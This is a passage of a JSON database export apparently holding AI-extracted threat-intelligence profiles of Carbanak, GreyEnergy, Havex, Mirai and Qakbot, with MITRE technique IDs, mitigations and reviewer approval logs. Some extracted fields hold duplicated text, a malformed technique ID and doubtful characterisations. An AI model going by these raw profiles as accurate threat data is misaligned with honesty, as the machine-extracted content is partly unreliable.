  "raw_serialized_analysis": "{\"threat_actor\": \"Carbanak\", \"country_of_origin\": \"\", \"attack_mitigations\": \"\", \"attack_consequences\": \"If an attack was successful,  there would be a large loss of money.\", \"threat_actor_sophistication\": null, \"threat_actor_overview\": \"Carbanak is a banking trojan discovered in 2014 that has targeted numerous financial institutions around the world., Carbanak is a banking trojan that was first discovered in 2014. It has been used to attack numerous financial institutions in many different countries.\", \"target_countries\": [\"All countries\"], \"target_regions\": [], \"target_populations\": [], \"threat_actor_intent\": [\"Information Theft\", \"Financial Theft\", \"Disruption of Service\", \"Espionage\", \"Credential Harvesting\"], \"target_industry_sectors\": [\"financial-services\"], \"threat_actor_capabilities\": [\"Windows Command Shell (T1059.003)\", \"Registry Run Keys / Startup Folder (T1547.001)\", \"Local account (T1136.001)\", \"Portable Executable Injection (T1055.002)\", \"File Deletion (T1070.004)\", \"Obfuscated Files or Information (T1027)\", \"Keylogging (T1056.001)\", \"OS Credential Dumping (T1003)\", \"Process Discovery (T1057)\", \"Query Discovery (T1012)\", \"Remote Desktop Protocol (T1021.001)\", \"Local Email Collection (T1114.001)\", \"Screen Capture (T1113)\", \"Web Protocols (T1071.001)\", \"Standard Encoding (T1132.001)\", \"Symmetric Cryptography (T1573.001)\", \"Data Transfer Size Limits (T1030)\", \"T1059.003\", \"T1547.001\", \"T1136.001\", \"T1055.002\", \"T1070.004\", \"T1027\", \"T1056.001\", \"T1003\", \"T1057\", \"T1012\", \"T1021.001\", \"T1114.001\", \"T1113\", \"T1071.001\", \"T1132.001\", \"T1573.001\", \"T1030\"], \"threat_actor_motives\": [\"Financial Gain\"], \"threat_actor_resources\": [\"organization\"], \"threat_actor_type\": [\"criminal\", \"crime-syndicate\"], \"aliases\": [], \"vulnerabilities\": [], \"sources\": [\"Malpedia\", \"Mitre\", \"The Record\", \"Trend Micro\"]}",
  "raw_openAI_analysis": "{\"threat_actor\": [\"Carbanak\"], \"aliases\": [], \"country_of_origin\": [], \"target_countries\": [\"All countries\"], \"target_regions\": [\"global\"], \"threat_actor_overview\": [\"Carbanak is a banking trojan discovered in 2014 that has targeted numerous financial institutions around the world.\", \"Carbanak is a banking trojan that was first discovered in 2014. It has been used to attack numerous financial institutions in many different countries.\"], \"target_populations\": [], \"target_industry_sectors\": [\"Financial services\", \"financial-services\", \"banking\"], \"threat_actor_intent\": [\"Information Theft\", \"Financial Theft\", \"Disruption of Service\", \"Espionage\", \"Credential Harvesting\"], \"threat_actor_capabilities\": [\"Windows Command Shell (T1059.003)\", \"Registry Run Keys / Startup Folder (T1547.001)\", \"Local account (T1136.001)\", \"Portable Executable Injection (T1055.002)\", \"File Deletion (T1070.004)\", \"Obfuscated Files or Information (T1027)\", \"Keylogging (T1056.001)\", \"OS Credential Dumping (T1003)\", \"Process Discovery (T1057)\", \"Query Discovery (T1012)\", \"Remote Desktop Protocol (T1021.001)\", \"Local Email Collection (T1114.001)\", \"Screen Capture (T1113)\", \"Web Protocols (T1071.001)\", \"Standard Encoding (T1132.001)\", \"Symmetric Cryptography (T1573.001)\", \"Data Transfer Size Limits (T1030)\", \"T1059.003\", \"T1547.001\", \"T1136.001\", \"T1055.002\", \"T1070.004\", \"T1027\", \"T1056.001\", \"T1003\", \"T1057\", \"T1012\", \"T1021.001\", \"T1114.001\", \"T1113\", \"T1071.001\", \"T1132.001\", \"T1573.001\", \"T1030\"], \"threat_actor_motives\": [\"Financial Gain\"], \"threat_actor_resources\": [\"Organization\", \"organization\"], \"threat_actor_sophistication\": [\"Advanced\", \"advanced\"], \"threat_actor_type\": [\"Criminal\", \"criminal\", \"crime-syndicate\"], \"attack_mitigations\": [], \"attack_consequences\": [\"If an attack was successful\", \" there would be a large loss of money.\"], \"vulnerabilities\": [], \"sources\": [\"Malpedia\", \"Mitre\", \"The Record\", \"Trend Micro\"]}",
  "approval_status": "APPROVED",
  "approval_status_changed_by": "bZWMRuiSPjWGfbhDpDVPLRBkixL2",
  "approval_status_changed_on": {
    "$date": "2023-09-12T16:53:46.237Z"
  },
  "approval_message": "Good and correct data",
  "change_log": [
    {
      "_id": {
        "$oid": "6500978b1230378a38688236"
      },
      "updated_by": "bZWMRuiSPjWGfbhDpDVPLRBkixL2",
      "updated_on": {
        "$date": "2023-09-12T16:53:31.034Z"
      },
      "changes": [
        {
          "field": "attack_mitigations",
          "previous_value": "",
          "updated_value": "Proper training, multi-factored authentication for sensitive files, and regularly backing up data"
        }
      ]
    }
  ],
  "threat_actor": "Carbanak"
},
{
  "_id": {
    "$oid": "64fa2c7767f750aba16f8f8a"
  },
  "report": {
    "$oid": "64fa2c69795f37678cbb2cd8"
  },
  "threat_actor_overview": "GreyEnergy is an advanced malware strain that evolved from BlackEnergy. It primarily focuses on espionage and reconnaissance,  targeting industrial control system workstations and servers running SCADA software. Its main motivation appears to be gathering intelligence and conducting cyber espionage activities,  with a particular emphasis on critical infrastructure sectors such as energy and industrial systems. GreyEnergy achieves distribution through spear-phishing campaigns and exploiting vulnerabilities in public-facing web servers. It poses a significant threat to critical infrastructure and reinforces the importance of robust cybersecurity measures.",
  "aliases": [
    "BlackEnergy"
  ],
  "sources": [
    "Bleeping Computer",
    "Dark Reading",
    "Mitre"
  ],
  "country_of_origin": "",
  "threat_actor_motives": [
    "Financial Gain",
    "Espionage"
  ],
  "threat_actor_intent": [
    "Information Theft",
    "Espionage"
  ],
  "threat_actor_capabilities": [
    "T1059.003",
    "T1543.003",
    "T1055.002",
    "T1070.004",
    "T1112",
    "T1027",
    "T1027.002",
    "T1055.002",
    "T1553.002",
    "T1218.011",
    "T1056.001",
    "T1003.001",
    "T1007",
    "T1056.001",
    "T1071.001",
    "T1573.002",
    "T1573.001",
    "T1105",
    "T1090.003"
  ],
  "threat_actor_resources": [
    "government"
  ],
  "threat_actor_type": [
    "unknown"
  ],
  "threat_actor_sophistication": "none",
  "target_countries": [
    "Ukraine"
  ],
  "target_regions": [],
  "target_populations": [],
  "target_industry_sectors": [
    "x-industry-sector--61b2d4fd-c6e0-457e-86a1-d787bb768f89",
    "x-industry-sector--8b825e7f-a701-41df-8938-8c304dc6d860",
    "x-industry-sector--f3f4f4e2-1810-4df2-a7ac-a65c9388ed23",
    "x-industry-sector--95c98046-4589-4c5f-976a-99089bb77b37"
  ],
  "attack_mitigations": "",
  "attack_consequences": "",
  "vulnerabilities": [],
  "raw_serialized_analysis": "{\"threat_actor\": \"GreyEnergy\", \"country_of_origin\": \"\", \"attack_mitigations\": \"\", \"attack_consequences\": \"\", \"threat_actor_sophistication\": null, \"threat_actor_overview\": \"GreyEnergy is an advanced malware strain that evolved from BlackEnergy. It primarily focuses on espionage and reconnaissance,  targeting industrial control system workstations and servers running SCADA software. Its main motivation appears to be gathering intelligence and conducting cyber espionage activities,  with a particular emphasis on critical infrastructure sectors such as energy and industrial systems. GreyEnergy achieves distribution through spear-phishing campaigns and exploiting vulnerabilities in public-facing web servers. It poses a significant threat to critical infrastructure and reinforces the importance of robust cybersecurity measures. \", \"target_countries\": [\"Ukraine\"], \"target_regions\": [], \"target_populations\": [], \"threat_actor_intent\": [\"Information Theft\", \"Espionage\"], \"target_industry_sectors\": [\"energy\", \"government-public-services\", \"government-national\", \"infrastructure\"], \"threat_actor_capabilities\": [\"T1059.003\", \"T1543.003\", \"T1055.002\", \"T1070.004\", \"T1112\", \"T1027\", \"T1027.002\", \"T1055.002\", \"T1553.002\", \"T1218.011\", \"T1056.001\", \"T1003.001\", \"T1007\", \"T1056.001\", \"T1071.001\", \"T1573.002\", \"T1573.001\", \"T1105\", \"T1090.003\"], \"threat_actor_motives\": [\"Financial Gain\", \"Espionage\"], \"threat_actor_resources\": [\"government\"], \"threat_actor_type\": [\"unknown\"], \"aliases\": [\"BlackEnergy\", \"GreyEnergy\"], \"vulnerabilities\": [], \"sources\": [\"Bleeping Computer\", \"Dark Reading\", \"Mitre\"]}",
  "raw_openAI_analysis": "{\"threat_actor\": [\"GreyEnergy\"], \"aliases\": [\"BlackEnergy\", \"GreyEnergy\"], \"country_of_origin\": [], \"target_countries\": [\"Ukraine\"], \"target_regions\": [\"Europe\", \"Asia\"], \"threat_actor_overview\": [\"GreyEnergy is an advanced malware strain that evolved from BlackEnergy. It primarily focuses on espionage and reconnaissance\", \" targeting industrial control system workstations and servers running SCADA software. Its main motivation appears to be gathering intelligence and conducting cyber espionage activities\", \" with a particular emphasis on critical infrastructure sectors such as energy and industrial systems. GreyEnergy achieves distribution through spear-phishing campaigns and exploiting vulnerabilities in public-facing web servers. It poses a significant threat to critical infrastructure and reinforces the importance of robust cybersecurity measures. \"], \"target_populations\": [], \"target_industry_sectors\": [\"energy\", \"government-public-services\", \"government-national\", \"infrastructure\"], \"threat_actor_intent\": [\"Information Theft\", \"Espionage\"], \"threat_actor_capabilities\": [\"T1059.003\", \"T1543.003\", \"T1055.002\", \"T1070.004\", \"T1112\", \"T1027\", \"T1027.002\", \"T1055.002\", \"T1553.002\", \"T1218.011\", \"T1056.001\", \"T1003.001\", \"T1007\", \"T1056.001\", \"T1071.001\", \"T1573.002\", \"T1573.001\", \"T1105\", \"T1090.003\"], \"threat_actor_motives\": [\"Financial Gain\", \"Espionage\"], \"threat_actor_resources\": [\"government\"], \"threat_actor_sophistication\": [\"advanced\"], \"threat_actor_type\": [\"unknown\"], \"attack_mitigations\": [], \"attack_consequences\": [], \"vulnerabilities\": [], \"sources\": [\"Bleeping Computer\", \"Dark Reading\", \"Mitre\"]}",
  "approval_status": "APPROVED",
  "approval_status_changed_by": "bZWMRuiSPjWGfbhDpDVPLRBkixL2",
  "approval_status_changed_on": {
    "$date": "2023-09-12T16:06:16.294Z"
  },
  "approval_message": "",
  "change_log": [
    {
      "_id": {
        "$oid": "64fa2cb3795f37678cbb2cd9"
      },
      "updated_by": "g9cPReJBIwRQGc7YTG41EIKhfrH2",
      "updated_on": {
        "$date": "2023-09-07T20:04:03.412Z"
      },
      "changes": [
        {
          "field": "threat_actor_overview",
          "previous_value": "GreyEnergy is an advanced malware strain that evolved from BlackEnergy. It primarily focuses on espionage and reconnaissance,  targeting industrial control system workstations and servers running SCADA software. Its main motivation appears to be gathering intelligence and conducting cyber espionage activities,  with a particular emphasis on critical infrastructure sectors such as energy and industrial systems. GreyEnergy achieves distribution through spear-phishing campaigns and exploiting vulnerabilities in public-facing web servers. It poses a significant threat to critical infrastructure and reinforces the importance of robust cybersecurity measures. ",
          "updated_value": "GreyEnergy is an advanced malware strain that evolved from BlackEnergy. It primarily focuses on espionage and reconnaissance,  targeting industrial control system workstations and servers running SCADA software. Its main motivation appears to be gathering intelligence and conducting cyber espionage activities,  with a particular emphasis on critical infrastructure sectors such as energy and industrial systems. GreyEnergy achieves distribution through spear-phishing campaigns and exploiting vulnerabilities in public-facing web servers. It poses a significant threat to critical infrastructure and reinforces the importance of robust cybersecurity measures."
        },
        {
          "field": "aliases",
          "previous_value": [
            "BlackEnergy",
            "GreyEnergy"
          ],
          "updated_value": [
            "BlackEnergy"
          ]
        }
      ]
    }
  ],
  "threat_actor": "GreyEnergy"
},
{
  "_id": {
    "$oid": "64fa2d1a67f750aba16f8f8b"
  },
  "report": {
    "$oid": "64fa2d0c795f37678cbb2cda"
  },
  "threat_actor_overview": "Havex is a Remote Access Trojan (RAT) discovered in 2013 that has significantly impacted critical infrastructure sites across the United States and Europe. It has targeted various sectors,  including energy,  aviation,  defense,  pharmaceuticals,  and petrochemicals. Within the energy sector,  Havex specifically focused on energy grid operators,  major electricity generation firms,  petroleum pipeline operators,  and industrial equipment providers,  aiming to gain unauthorized access to their systems. The malware's presence in other critical industries such as aviation,  defense,  pharmaceuticals,  and petrochemicals has raised concerns about potential breaches and their consequences., Havex is a Remote Access Trojan (RAT) discovered in 2013. It has significantly impacted critical infrastructure sites across the United States and Europe,  targeting sectors such as energy,  and petrochemicals. It specifically focuses on energy grid operators,  and industrial equipment providers. Havex aims to gain unauthorized access to systems and has raised concerns about potential breaches and their consequences., Havex is a Remote Access Trojan (RAT) that was discovered in 2013. It has significantly impacted critical infrastructure sites in the United States and Europe, particularly targeting sectors such as energy, aviation, defense, pharmaceuticals, and petrochemicals. Within the energy sector, Havex specifically focuses on energy grid operators, major electricity generation firms, petroleum pipeline operators, and industrial equipment providers, aiming to gain unauthorized access to their systems. The malware's presence in other critical industries such as aviation, defense, pharmaceuticals, and petrochemicals raises concerns about potential breaches and their consequences.",
  "sources": [
    "Malpedia",
    "CISA Article"
  ],
  "country_of_origin": "",
  "threat_actor_motives": [],
  "threat_actor_intent": [
    "Information Theft",
    "Disruption of Service"
  ],
  "threat_actor_capabilities": [
    "T1547.001",
    "T1055",
    "T1070.004",
    "T1555.003",
    "T1087.003",
    "T1083",
    "T1057",
    "T1082",
    "T1016",
    "T1033",
    "T1560",
    "T1132.001",
    "T08655",
    "T0862",
    "T0863",
    "T0846",
    "T0888",
    "T0802",
    "T0861",
    "T0814",
    "T0813"
  ],
  "threat_actor_resources": [],
  "threat_actor_type": [],
  "threat_actor_sophistication": "none",
  "target_countries": [
    "US",
    "Europe"
  ],
  "target_regions": [
    "americas",
    "europe"
  ],
  "target_populations": [],
  "target_industry_sectors": [
    "x-industry-sector--61b2d4fd-c6e0-457e-86a1-d787bb768f89",
    "x-industry-sector--303baa8e-4b41-4e86-9daa-0aa0ecffc1f8",
    "x-industry-sector--0c895333-cced-4b2a-bd60-de0e8f0f2ba8"
  ],
  "attack_mitigations": "implement robust cybersecurity measures, network segmentation, regular software updates, intrusion detection systems, comprehensive employee training programs, Implement robust cybersecurity measures, including network segmentation, regular software updates, intrusion detection systems, and comprehensive employee training programs., Implement robust cybersecurity measures including network segmentation, regular software updates, intrusion detection systems, and comprehensive employee training programs.",
  "attack_consequences": "stolen data, safety and environmental risks, operational disruption, supply chain compromise, Stolen data, safety and environmental risks, operational disruption, supply chain compromise., Potential disruption or compromise of critical infrastructure systems, stolen data, safety and environmental risks, operational disruption, and supply chain compromise.",
  "raw_serialized_analysis": "{\"threat_actor\": \"Havex, Havex RAT, Unknown\", \"country_of_origin\": \"\", \"attack_mitigations\": \"implement robust cybersecurity measures, network segmentation, regular software updates, intrusion detection systems, comprehensive employee training programs, Implement robust cybersecurity measures, including network segmentation, regular software updates, intrusion detection systems, and comprehensive employee training programs., Implement robust cybersecurity measures including network segmentation, regular software updates, intrusion detection systems, and comprehensive employee training programs.\", \"attack_consequences\": \"stolen data, safety and environmental risks, operational disruption, supply chain compromise, Stolen data, safety and environmental risks, operational disruption, supply chain compromise., Potential disruption or compromise of critical infrastructure systems, stolen data, safety and environmental risks, operational disruption, and supply chain compromise.\", \"threat_actor_sophistication\": null, \"threat_actor_overview\": \"Havex is a Remote Access Trojan (RAT) discovered in 2013 that has significantly impacted critical infrastructure sites across the United States and Europe. It has targeted various sectors,  including energy,  aviation,  defense,  pharmaceuticals,  and petrochemicals. Within the energy sector,  Havex specifically focused on energy grid operators,  major electricity generation firms,  petroleum pipeline operators,  and industrial equipment providers,  aiming to gain unauthorized access to their systems. The malware's presence in other critical industries such as aviation,  defense,  pharmaceuticals,  and petrochemicals has raised concerns about potential breaches and their consequences., Havex is a Remote Access Trojan (RAT) discovered in 2013. It has significantly impacted critical infrastructure sites across the United States and Europe,  targeting sectors such as energy,  and petrochemicals. It specifically focuses on energy grid operators,  and industrial equipment providers. Havex aims to gain unauthorized access to systems and has raised concerns about potential breaches and their consequences., Havex is a Remote Access Trojan (RAT) that was discovered in 2013. It has significantly impacted critical infrastructure sites in the United States and Europe, particularly targeting sectors such as energy, aviation, defense, pharmaceuticals, and petrochemicals. Within the energy sector, Havex specifically focuses on energy grid operators, major electricity generation firms, petroleum pipeline operators, and industrial equipment providers, aiming to gain unauthorized access to their systems. The malware's presence in other critical industries such as aviation, defense, pharmaceuticals, and petrochemicals raises concerns about potential breaches and their consequences.\", \"target_countries\": [\"US\", \"Europe\"], \"target_regions\": [\"americas\", \"europe\"], \"target_populations\": [], \"threat_actor_intent\": [\"Information Theft\", \"Disruption of Service\"], \"target_industry_sectors\": [\"energy\", \"defense\", \"pharmaceuticals\"], \"threat_actor_capabilities\": [\"T1547.001\", \"T1055\", \"T1070.004\", \"T1555.003\", \"T1087.003\", \"T1083\", \"T1057\", \"T1082\", \"T1016\", \"T1033\", \"T1560\", \"T1132.001\", \"T08655\", \"T0862\", \"T0863\", \"T0846\", \"T0888\", \"T0802\", \"T0861\", \"T0814\", \"T0813\"], \"threat_actor_motives\": [], \"threat_actor_resources\": [], \"threat_actor_type\": [], \"aliases\": [\"Unknown\"], \"vulnerabilities\": [\"CVE-2013-3660\", \"CVE-2014-4113\"], \"sources\": [\"Malpedia\", \"CISA Article\"]}",
  "raw_openAI_analysis": "{\"threat_actor\": [\"Havex\", \"Havex RAT\", \"Unknown\"], \"aliases\": [\"Unknown\"], \"country_of_origin\": [null], \"target_countries\": [null, \"US\", \"Europe\"], \"target_regions\": [\"United States\", \"Europe\", \"americas\", \"europe\", \"US\"], \"threat_actor_overview\": [\"Havex is a Remote Access Trojan (RAT) discovered in 2013 that has significantly impacted critical infrastructure sites across the United States and Europe. It has targeted various sectors\", \" including energy\", \" aviation\", \" defense\", \" pharmaceuticals\", \" and petrochemicals. Within the energy sector\", \" Havex specifically focused on energy grid operators\", \" major electricity generation firms\", \" petroleum pipeline operators\", \" and industrial equipment providers\", \" aiming to gain unauthorized access to their systems. The malware's presence in other critical industries such as aviation\", \" defense\", \" pharmaceuticals\", \" and petrochemicals has raised concerns about potential breaches and their consequences.\", \"Havex is a Remote Access Trojan (RAT) discovered in 2013. It has significantly impacted critical infrastructure sites across the United States and Europe\", \" targeting sectors such as energy\", \" and petrochemicals. It specifically focuses on energy grid operators\", \" and industrial equipment providers. Havex aims to gain unauthorized access to systems and has raised concerns about potential breaches and their consequences.\", \"Havex is a Remote Access Trojan (RAT) that was discovered in 2013. It has significantly impacted critical infrastructure sites in the United States and Europe, particularly targeting sectors such as energy, aviation, defense, pharmaceuticals, and petrochemicals. Within the energy sector, Havex specifically focuses on energy grid operators, major electricity generation firms, petroleum pipeline operators, and industrial equipment providers, aiming to gain unauthorized access to their systems. The malware's presence in other critical industries such as aviation, defense, pharmaceuticals, and petrochemicals raises concerns about potential breaches and their consequences.\"], \"target_populations\": [null], \"target_industry_sectors\": [\"energy\", \"aviation\", \"defense\", \"pharmaceuticals\", \"petrochemicals\", \"Energy\", \"Aviation\", \"Defense\", \"Pharmaceuticals\", \"Petrochemicals\"], \"threat_actor_intent\": [null, \"Information Theft\", \"Disruption of Service\"], \"threat_actor_capabilities\": [null, \"T1547.001\", \"T1055\", \"T1070.004\", \"T1555.003\", \"T1087.003\", \"T1083\", \"T1057\", \"T1082\", \"T1016\", \"T1033\", \"T1560\", \"T1132.001\", \"T08655\", \"T0862\", \"T0863\", \"T0846\", \"T0888\", \"T0802\", \"T0861\", \"T0814\", \"T0813\"], \"threat_actor_motives\": [null, \"Economic Espionage\", \"Disruption of Critical Infrastructure\", \"State-Sponsored activities\"], \"threat_actor_resources\": [null, \"Unknown\"], \"threat_actor_sophistication\": [null, \"Unknown\"], \"threat_actor_type\": [null, \"Unknown\"], \"attack_mitigations\": [\"implement robust cybersecurity measures\", \"network segmentation\", \"regular software updates\", \"intrusion detection systems\", \"comprehensive employee training programs\", \"Implement robust cybersecurity measures, including network segmentation, regular software updates, intrusion detection systems, and comprehensive employee training programs.\", \"Implement robust cybersecurity measures including network segmentation, regular software updates, intrusion detection systems, and comprehensive employee training programs.\"], \"attack_consequences\": [\"stolen data\", \"safety and environmental risks\", \"operational disruption\", \"supply chain compromise\", \"Stolen data, safety and environmental risks, operational disruption, supply chain compromise.\", \"Potential disruption or compromise of critical infrastructure systems, stolen data, safety and environmental risks, operational disruption, and supply chain compromise.\"], \"vulnerabilities\": [null, \"CVE-2013-3660\", \"CVE-2014-4113\"], \"sources\": [\"Malpedia\", \"CISA Article\"]}",
  "approval_status": "APPROVED",
  "approval_status_changed_by": "bZWMRuiSPjWGfbhDpDVPLRBkixL2",
  "approval_status_changed_on": {
    "$date": "2023-09-12T16:08:00.589Z"
  },
  "approval_message": "",
  "change_log": [
    {
      "_id": {
        "$oid": "64fa2dbd795f37678cbb2cdd"
      },
      "updated_by": "g9cPReJBIwRQGc7YTG41EIKhfrH2",
      "updated_on": {
        "$date": "2023-09-07T20:08:29.389Z"
      },
      "changes": [
        {
          "field": "vulnerabilities",
          "previous_value": [
            "CVE-2013-3660",
            "CVE-2014-4113"
          ],
          "updated_value": []
        }
      ]
    },
    {
      "_id": {
        "$oid": "64fa2d46795f37678cbb2cdc"
      },
      "updated_by": "g9cPReJBIwRQGc7YTG41EIKhfrH2",
      "updated_on": {
        "$date": "2023-09-07T20:06:30.963Z"
      },
      "changes": [
        {
          "field": "aliases",
          "previous_value": [
            "Unknown"
          ],
          "updated_value": []
        }
      ]
    },
    {
      "_id": {
        "$oid": "64fa2d31795f37678cbb2cdb"
      },
      "updated_by": "g9cPReJBIwRQGc7YTG41EIKhfrH2",
      "updated_on": {
        "$date": "2023-09-07T20:06:09.479Z"
      },
      "changes": [
        {
          "field": "threat_actor",
          "previous_value": "Havex, Havex RAT, Unknown",
          "updated_value": "Havex"
        }
      ]
    }
  ],
  "threat_actor": "Havex"
},
{
  "_id": {
    "$oid": "64fa2eea67f750aba16f8f8e"
  },
  "report": {
    "$oid": "64fa2e02795f37678cbb2cde"
  },
  "threat_actor_overview": "Mirai is a malware/botnet strain that surfaced in 2016 and gained considerable attention in 2023 following a CISA warning and a subsequent federal mandate to update all government devices. It primarily targets Zyxel firewalls and IoT devices,  and its notable impact lies in its capability to launch remote DDoS attacks,  primarily targeting industrial sectors., Mirai is a botnet that surfaced in 2016 and gained considerable attention in 2023 following a CISA warning and subsequent federal mandate to update all government devices. It initially targeted Zyxel firewalls but has expanded its reach to other vulnerable devices,  especially IoT devices. Mirai is known for launching remote distributed denial-of-service (DDoS) attacks primarily targeting industrial sectors.",
  "aliases": [
    "Mirai botnet",
    "Mirai Botnet"
  ],
  "sources": [
    "BleepingComputer",
    "DarkReading",
    "HackRead",
    "HelpNetSecurity",
    "InfoSecurity-Magazine",
    "MalwareBazaar",
    "The Hacker News",
    "TrendMicro"
  ],
  "country_of_origin": "",
  "threat_actor_motives": [],
  "threat_actor_intent": [],
  "threat_actor_capabilities": [],
  "threat_actor_resources": [],
  "threat_actor_type": [],
  "threat_actor_sophistication": "none",
  "target_countries": [],
  "target_regions": [],
  "target_populations": [],
  "target_industry_sectors": [],
  "attack_mitigations": "Regularly update system security,  patch vulnerabilities,  ensure the security of endpoint connections,  have up-to-date telnet/SSH credentials,  disconnect infected IoT devices from the network and perform a reboot,  disable Universal Plug and Play (UPnP) on routers unless necessary,  monitor IP port 2323/TCP and 23/TCP for unauthorized control attempts over IoT devices using the Telnet protocol., Patch vulnerabilities, Ensure security of endpoint connections, Have up-to-date telnet/SSH credentials, Disconnect infected IoT devices from the network and perform a reboot, Disable Universal Plug and Play (UPnP) on routers unless necessary, Monitor IP port 2323/TCP and 23/TCP for unauthorized control attempts over IoT devices",
  "attack_consequences": "Loss of services,  recruitment of infected systems to a wider botnet., Recruitment of infected systems into a wider botnet",
  "vulnerabilities": [
    "CVE-2023-28771"
  ],
  "raw_serialized_analysis": "{\"threat_actor\": \"Mirai\", \"country_of_origin\": \"\", \"attack_mitigations\": \"Regularly update system security,  patch vulnerabilities,  ensure the security of endpoint connections,  have up-to-date telnet/SSH credentials,  disconnect infected IoT devices from the network and perform a reboot,  disable Universal Plug and Play (UPnP) on routers unless necessary,  monitor IP port 2323/TCP and 23/TCP for unauthorized control attempts over IoT devices using the Telnet protocol., Patch vulnerabilities, Ensure security of endpoint connections, Have up-to-date telnet/SSH credentials, Disconnect infected IoT devices from the network and perform a reboot, Disable Universal Plug and Play (UPnP) on routers unless necessary, Monitor IP port 2323/TCP and 23/TCP for unauthorized control attempts over IoT devices\", \"attack_consequences\": \"Loss of services,  recruitment of infected systems to a wider botnet., Recruitment of infected systems into a wider botnet\", \"threat_actor_sophistication\": null, \"threat_actor_overview\": \"Mirai is a malware/botnet strain that surfaced in 2016 and gained considerable attention in 2023 following a CISA warning and a subsequent federal mandate to update all government devices. It primarily targets Zyxel firewalls and IoT devices,  and its notable impact lies in its capability to launch remote DDoS attacks,  primarily targeting industrial sectors., Mirai is a botnet that surfaced in 2016 and gained considerable attention in 2023 following a CISA warning and subsequent federal mandate to update all government devices. It initially targeted Zyxel firewalls but has expanded its reach to other vulnerable devices,  especially IoT devices. Mirai is known for launching remote distributed denial-of-service (DDoS) attacks primarily targeting industrial sectors.\", \"target_countries\": [], \"target_regions\": [], \"target_populations\": [], \"threat_actor_intent\": [], \"target_industry_sectors\": [], \"threat_actor_capabilities\": [], \"threat_actor_motives\": [], \"threat_actor_resources\": [], \"threat_actor_type\": [], \"aliases\": [\"Mirai botnet\", \"Mirai Botnet\"], \"vulnerabilities\": [\"CVE-2023-28771\"], \"sources\": [\"BleepingComputer\", \"DarkReading\", \"HackRead\", \"HelpNetSecurity\", \"InfoSecurity-Magazine\", \"MalwareBazaar\", \"The Hacker News\", \"TrendMicro\"]}",
  "raw_openAI_analysis": "{\"threat_actor\": [\"Mirai\"], \"aliases\": [\"Mirai botnet\", \"Mirai Botnet\"], \"country_of_origin\": [], \"target_countries\": [null], \"target_regions\": [], \"threat_actor_overview\": [\"Mirai is a malware/botnet strain that surfaced in 2016 and gained considerable attention in 2023 following a CISA warning and a subsequent federal mandate to update all government devices. It primarily targets Zyxel firewalls and IoT devices\", \" and its notable impact lies in its capability to launch remote DDoS attacks\", \" primarily targeting industrial sectors.\", \"Mirai is a botnet that surfaced in 2016 and gained considerable attention in 2023 following a CISA warning and subsequent federal mandate to update all government devices. It initially targeted Zyxel firewalls but has expanded its reach to other vulnerable devices\", \" especially IoT devices. Mirai is known for launching remote distributed denial-of-service (DDoS) attacks primarily targeting industrial sectors.\"], \"target_populations\": [], \"target_industry_sectors\": [\"industrial\"], \"threat_actor_intent\": [], \"threat_actor_capabilities\": [], \"threat_actor_motives\": [], \"threat_actor_resources\": [], \"threat_actor_sophistication\": [], \"threat_actor_type\": [], \"attack_mitigations\": [\"Regularly update system security\", \" patch vulnerabilities\", \" ensure the security of endpoint connections\", \" have up-to-date telnet/SSH credentials\", \" disconnect infected IoT devices from the network and perform a reboot\", \" disable Universal Plug and Play (UPnP) on routers unless necessary\", \" monitor IP port 2323/TCP and 23/TCP for unauthorized control attempts over IoT devices using the Telnet protocol.\", \"Patch vulnerabilities\", \"Ensure security of endpoint connections\", \"Have up-to-date telnet/SSH credentials\", \"Disconnect infected IoT devices from the network and perform a reboot\", \"Disable Universal Plug and Play (UPnP) on routers unless necessary\", \"Monitor IP port 2323/TCP and 23/TCP for unauthorized control attempts over IoT devices\"], \"attack_consequences\": [\"Loss of services\", \" recruitment of infected systems to a wider botnet.\", \"Recruitment of infected systems into a wider botnet\"], \"vulnerabilities\": [null, {\"CVE_ID\": \"CVE-2023-28771\"}, \"CVE-2023-28771\"], \"sources\": [\"BleepingComputer\", \"DarkReading\", \"HackRead\", \"HelpNetSecurity\", \"InfoSecurity-Magazine\", \"MalwareBazaar\", \"The Hacker News\", \"TrendMicro\"]}",
  "approval_status": "REJECTED",
  "approval_status_changed_by": "g9cPReJBIwRQGc7YTG41EIKhfrH2",
  "approval_status_changed_on": {
    "$date": "2023-09-07T20:13:48.700Z"
  },
  "approval_message": "Didn't identify MITRE IDs",
  "change_log": [],
  "threat_actor": "Mirai"
},
{
  "_id": {
    "$oid": "64fa42baa18725e9141732b9"
  },
  "report": {
    "$oid": "64fa41550940cdd46e7ee9ef"
  },
  "threat_actor_overview": "The Qakbot botnet,  also known as Qbot or Pinkslipbot,  has been disrupted in an international cyber takedown operation conducted by law enforcement agencies. The operation began on August 25,  2023,  when law enforcement gained access to the botnet and redirected its traffic through servers controlled by them. Qakbot-infected computers were instructed to download an Uninstall file,  designed to remove Qakbot malware from the infected machines and prevent further installations. However,  it did not address other malware already present on the systems.",
  "aliases": [
    "Qbot",
    "Pinkslipbot"
  ],
  "sources": [],
  "country_of_origin": "",
  "threat_actor_motives": [],
  "threat_actor_intent": [],
  "threat_actor_capabilities": [],
  "threat_actor_resources": [],
  "threat_actor_type": [],
  "threat_actor_sophistication": "none",
  "target_countries": [],
  "target_regions": [],
  "target_populations": [],
  "target_industry_sectors": [],
  "attack_mitigations": "",
  "attack_consequences": "",
  "vulnerabilities": [],
  "raw_serialized_analysis": "{\"threat_actor\": \"Qakbot\", \"country_of_origin\": \"\", \"attack_mitigations\": \"\", \"attack_consequences\": \"\", \"threat_actor_sophistication\": null, \"threat_actor_overview\": \"The Qakbot botnet,  also known as Qbot or Pinkslipbot,  has been disrupted in an international cyber takedown operation conducted by law enforcement agencies. The operation began on August 25,  2023,  when law enforcement gained access to the botnet and redirected its traffic through servers controlled by them. Qakbot-infected computers were instructed to download an Uninstall file,  designed to remove Qakbot malware from the infected machines and prevent further installations. However,  it did not address other malware already present on the systems.\", \"target_countries\": [], \"target_regions\": [], \"target_populations\": [], \"threat_actor_intent\": [], \"target_industry_sectors\": [], \"threat_actor_capabilities\": [], \"threat_actor_motives\": [], \"threat_actor_resources\": [], \"threat_actor_type\": [], \"aliases\": [\"Qbot\", \"Pinkslipbot\"], \"vulnerabilities\": [], \"sources\": []}",
